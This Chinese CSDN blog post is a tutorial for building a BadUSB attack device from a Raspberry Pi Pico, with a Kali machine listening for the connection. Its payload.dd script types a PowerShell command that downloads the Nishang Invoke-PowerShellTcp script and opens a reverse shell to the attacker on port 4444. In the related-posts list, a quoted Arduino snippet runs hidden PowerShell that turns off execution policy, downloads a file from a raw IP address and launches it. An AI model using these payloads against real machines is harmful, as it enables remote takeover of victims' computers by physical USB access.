BadUsb制作

于 2024-03-09 19:42:05 发布
阅读量577 收藏 13
点赞数 9
文章标签: 安全 树莓派 pico badusb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43893278/article/details/136589361
版权
本文介绍了如何使用BadUSB技术在树莓派picokali上创建一个恶意USB设备,通过复制固件文件并执行PowerShell脚本来远程控制。教程详细说明了如何加载payload、交互式操作以及重新插入设备的过程,涉及网络安全和漏洞利用。
摘要由CSDN通过智能技术生成

BadUsb制作

一个树莓派pico
在这里插入图片描述
kali监听
在这里插入图片描述
需要的文件
https://pan.baidu.com/s/1_kyzXIqk9JWHGHstTgq7sQ?pwd=6666

在这里插入图片描述
1.将pico插入电脑
2.将Bad USB固件中的文件复制到pico中,pico会重启
3.将Bad USB目录文件复制进去(打开Bad USB目录文件复制)
在这里插入图片描述
其中,payload.dd是需要写入代码的

DELAY 200
GUI r

DELAY 200
STRING powershell -NoP -NonI


DELAY 500
LEFTARROW
ENTER

DELAY 500
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress kali的ip -Port 4444
ENTER

重新插入pico
在这里插入图片描述

noc_13
关注
  • 9
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Bad usb实现U盘攻击
qq_40624810的博客
09-18 7170
1、Bad usb介绍及原理 介绍 BadUSB是利用伪造HID设备执行攻击载荷的一种攻击方式。用户插入BadUSB,就会自动执行预置在固件中的恶意代码,如下载服务器上的恶意文件,执行恶意操作等。由于恶意代码内置于设备初始化固件中,而不是通过autorun.inf等媒体自动播放文件进行控制,因此无法通过禁用媒体自动播放进行防御,杀毒软件更是无法检测设备固件中的恶意代码。这种攻击方式可以在不经意...
插一个U盘黑一台电脑-Badusb最详细制作教程
热门推荐
J0o1ey Blog
08-01 2万+
0x001-简介 1.概述 在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态。...
BadUSB攻击
qq_45391176的博客
09-08 2143
一文读懂Bad USB
基于树莓派的多功能USB实现--BadUSB模式
qinguo123的博客
02-06 4488
此文首先发表于微信公众号。具体详情请移步公众号查看:WriteSimpleDemo Github https://github.com/pedroqin/RaspberryPi-based-multi-functional-USB-Device Badusb介绍 BadUSB is a dangerous USB security flaw that allows attackers to ...
Badusb制作及使用(渗透windows)
QQ670663的博客
06-19 6216
目录一、安装Dpinst驱动二、配置Automator三、实现插入Babusb远程渗透win10系统“BadUSB”是计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在BlackHat安全大会上公布。BadUSB最可怕的一点是恶意代码存在于U盘的固件中,由于PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件和U盘格式化都无法应对BadUSB进行攻击。........................
单片机基础---badusb制作
空の城的博客
10-26 535
材料 硬件 Arduino Leonardo PC一台 TOG转换线 软件 Arduino IDE //用于烧录单片机 脑子(这个最重要!!!) 整活 安装软件 首先安装好Arduino IDE 网上的教程较多,在此不再赘述(尽量安装最新版的软件这样就可以不用手动装驱动) 工具->开发板 选择Arduino Leonardo 工具->端口 选择(开发板对应的端口) 了解代码结构 默认情况下,软件为我们创建了两个函数void setup() void lo
IOT黑客入门篇之初探Badusb
网安君的博客
11-14 2521
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击。例如,USB 闪存驱动器可以包含可编程的Intel 8051微控制器,该微控制器可以重新编程,将USB闪存驱动器变成恶意设备。BadUSB 攻击是在 2014 年由Karsten Nohl、Sascha Krißler和Jakob Lell在一次Black Hat演讲中首次披露的。演讲两个月后,其他研究人员发布了可用于利用该漏洞的代码。2017年,USG加密狗1.0版本发布,其作用类似于硬件防火墙,旨在防止BadUSB风格的攻击。
badusb.zip_bad usb_badusb_badusb下载_badusb制作教程_badusb脚本开发
09-21
【描述】中的"badusb制作工具包"表明,这个压缩包可能包含用于研究或教学目的的BadUSB工具和教程。"需要自行打包带走"暗示用户需要自己处理和理解这些工具,可能涉及到编译、配置或定制化的过程,需要一定的技术背景...
[Psychson-master] BadUSB制作工程源代码
05-02
BadUSB是一种安全漏洞,它利用了USB设备的固有可编程性来实现恶意攻击。这个概念在2014年由安全研究者Karsten Nohl和Sven Schreiber提出,他们展示了如何将普通的USB设备(如U盘)改造成能够执行恶意代码、劫持键盘...
stm32 badusb
11-01
STM32 BadUSB是一个利用STM32F103C8T6微控制器制作USB设备,该设备能够模拟各种USB设备类型,如键盘、鼠标甚至存储设备,从而实现特定的功能或进行安全测试。BadUSB的概念源自于对USB设备安全性的担忧,它可以被...
bad usb编译器
08-08
bad usb的编译器,欢迎下载。 Digispark Digispark是一个基于ATTINY85微控制器的开发板,体积小且价钱便宜,功能方面则没有Arduino般强大。代码与Arduino大同小異,也是使用Arduino IDE开发。 Digispark是Digistump LLC (digistump.com)版权所有,请使用者仔细阅读Digispark使用协议和版权声明 Digispark的特别之处是使用了USB与电脑沟通,省了USB至串口转换器。为此,Digispark必须占用2KB的快闪记忆体(Flash Memory)以便用来安装Bootloader。 Digispark的功能 打开Examples,大概知道Digispark的功能到达什么程度了。麻雀虽小,五脏俱全。
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C sET-eXECUTIONpOLICY UNRESTRICTED -FORCE;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://182.16.98.84/1.TXT', 'D:1.TXT');START D:1.TXT;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }
BadUSB-code:收集badusb的一些利用方式及代码
05-12
BadUSB-code收集badusb的一些利用方式及代码ino_code 中的.ino代码为上传到硬件的代码,无需服务器中配置。##代码涉及OS版本代码适用版本在文件名中用括号标明。win xp,7,8,10Kali原理及制作可参考:特别感谢...
BADUSB代码及服务器地址.txt
07-21
BADUSB代码及服务器地址,主要用于arduino配置及BADUSB制作
badusb详细制作教程(两种方式实现远控)
Ghost_system的博客
08-17 1万+
badusb是一种几乎可以突破任何杀毒软件和防火墙的设备,堪称渗透测试利器 文章目录前言一、什么是badusb?二,badusb的优点三,badusb是如何攻击的?badusb原理HID攻击漏洞产生原因三、准备步骤1.设备2,编辑器的安装与设置四,编写代码(重点)第一种: SEToolkit + badusb实现PowerShell注入攻击第二种:Cobalt Strike + badusb 实现PowerShell注入攻击五,烧录六,badusb有多强大攻击场景总结 BadUSB是《黑客军团》中
疯狂的极客--初识BadUSB
Peter_FHC的博客
05-27 2455
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击,主流有四种工具,本文便对其做简单介绍。
自制BadUSB!!(电脑强制关机)
最新发布
Pleasure1234的博客
01-22 1199
在美剧《黑客军团》中有过这样一个画面,组织成员在警局停车场随机的撒下大量用于钓鱼的 U 盘,然后就发生了下面的画面,然而此时警局的电脑已经被黑,即使断网也已经无济于事了。这就是一种黑客常用的手段 —— 利用 BadUSB 攻击而我今天想要介绍的只是该手段中的其中一种变体,利用了 USB 设备模拟成 HID 设备(Human Interface Device,人机交互设备,比如键盘或鼠标),从而执行代码,进行攻击和数据篡改等操作。下面的图片可以看出它伪装成了人体学输入设备。
BadUSB制作教程_BadUSB简单示例(初学)_程序编写工具
Jason Xu 的博客
04-10 5849
说明 本文章仅供学习交流,请勿用于非法用途 我用的是CJMCU-Beetle arduino Leonardo USB ATMEGA32U4 Mini Size Development Board 官网购买地址https://www.thanksbuyer.com/cjmcu-beetle-arduino-leonardo-usb-atmega32u4-mini-size-development-board-35975 软件-Arduino Kali下自带 Windows下 官网下载地址 https://
Badusb原理及制作并简单免杀实现远控教程
天乐的博客
10-23 1万+
2014年美国黑帽大会上研究人员JakobLell和Karsten Nohl展示了badusb的攻击方法后,国内与badusb相关的文章虽然有了一些,但是大部分人把相关文章都阅读后还是会有种“不明觉厉”的感觉,badusb仍有一层朦胧的面纱。本文将带你揭开这层神秘的面纱。 Badusb原理:利用HID(Human InterfaceDevice,是计算机直接与人交互的设备,例如键盘、鼠标等)进行攻击,将USB设备伪装使电脑识别为键盘,再利用USB设备中的微控制芯片,向主机发送命令,从而实现完全控制主机。 漏
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值